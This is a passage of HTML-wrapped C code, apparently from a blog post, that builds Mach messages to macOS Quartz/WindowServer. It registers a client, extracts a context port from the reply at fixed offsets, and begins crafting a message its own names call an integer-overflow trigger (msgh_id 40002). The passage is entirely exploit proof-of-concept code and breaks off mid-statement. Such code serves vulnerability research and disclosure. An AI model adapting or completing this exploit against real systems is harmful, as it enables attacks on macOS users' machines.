id=\"crayon-5c045a5ab3043485934892-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_register_client_s <\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_register_client_s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_header_t <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_port_descriptor_t <\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding<\/span><span 
class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">quartz_register_client_t <\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-e\">MACH_MSGH_BITS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_MAKE_SEND_ONCE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">MACH_MSGH_BITS_COMPLEX<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_remote_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_local_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mig_get_reply_port<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40202<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ _XRegisterClient<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_SEND_MSG<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_RCV_MSG<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_local_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TIMEOUT_NONE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] Send message failed: 
%s\\n&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_port_t <\/span><span class=\"crayon-v\">context_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-80\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">conn_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_function_int_overflow_s <\/span><span class=\"crayon-v\">quartz_function_int_overflow_t<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_function_int_overflow_s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-84\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_header_t <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-87\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">quartz_function_int_overflow_t <\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-90\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">MACH_MSGH_BITS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSGH_BITS_COMPLEX<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_remote_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">context_port<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40002<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-93\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span 